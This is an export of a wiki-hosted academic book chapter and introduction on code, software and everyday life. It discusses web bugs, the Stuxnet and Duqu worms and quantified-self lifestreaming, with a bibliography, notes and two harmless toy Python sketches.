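The comparative step can be illustrated very simply: hold a historical series, compute a norm, and flag current readings that deviate from it. The data, threshold and names below are arbitrary illustrations. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Toy sketch of comparing a lifestream reading against a personal norm. &lt;br /&gt;
from statistics import mean, stdev &lt;br /&gt;
&lt;br /&gt;
history = [7.2, 6.8, 7.5, 7.1, 6.9, 7.4, 7.0]  # e.g. hours of sleep logged &lt;br /&gt;
&lt;br /&gt;
def deviates(reading, baseline, threshold=2.0): &lt;br /&gt;
    """Flag readings more than threshold standard deviations from the norm.""" &lt;br /&gt;
    norm, spread = mean(baseline), stdev(baseline) &lt;br /&gt;
    return abs(reading - norm) > threshold * spread &lt;br /&gt;
&lt;br /&gt;
print(deviates(4.5, history))  # True: far below this user's norm &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;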
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that enable the data transfers, carrying the data that fuels the computational economy. Our movements between systems, carrying USB sticks, logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs, learning our habits and preferences in real-time whilst secreting themselves within our computer systems, raises important questions. Meanwhile, users are actively downloading apps that advertise the fact that they collect this data, and seem to find a genuine existential relief or recognition in their movements being recorded and made available for later playback or analysis. Web bugs, in many ways, are life streams – albeit life streams that have not been authorized by the user whom they are monitoring. These collectors, which we might call ''compactants'', are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of the computational agents that are collecting information: passive in quality – under the surface, relatively benign and silent – yet aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each side of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems, made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally, or without due regard to what has been described as ‘future self continuity’ (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and a potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship (ref: 211106) which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Notes'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
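&lt;br /&gt;
A schematic rendering of that exchange, with invented header values (an illustration only, not any particular site's cookies): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Schematic cookie round-trip (invented values): the server sets state on &lt;br /&gt;
# the first response; the browser echoes it back until the cookie expires. &lt;br /&gt;
def first_response(): &lt;br /&gt;
    # the server registers client "state" by setting a cookie (max 4 KB each) &lt;br /&gt;
    return {"Set-Cookie": "uid=abc123; Max-Age=86400; Path=/"} &lt;br /&gt;
&lt;br /&gt;
def next_request(stored_cookies): &lt;br /&gt;
    # the browser automatically attaches stored cookies to later requests &lt;br /&gt;
    return {"Cookie": "; ".join(stored_cookies)} &lt;br /&gt;
&lt;br /&gt;
cookies = [first_response()["Set-Cookie"].split(";")[0]]  # keep "uid=abc123" &lt;br /&gt;
print(next_request(cookies))  # {'Cookie': 'uid=abc123'} &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;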
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. It does this by taking advantage of a computer's file- or information-transport features, such as its networking setup, which it exploits to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad: careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enrichment process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (and Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is a suspicion that there may have been three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, though, some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Compactants: computational actants, drawing the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4697</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4697"/>
		<updated>2012-04-18T13:38:22Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment; indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how we live today in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. That has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. Such concerns relate to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
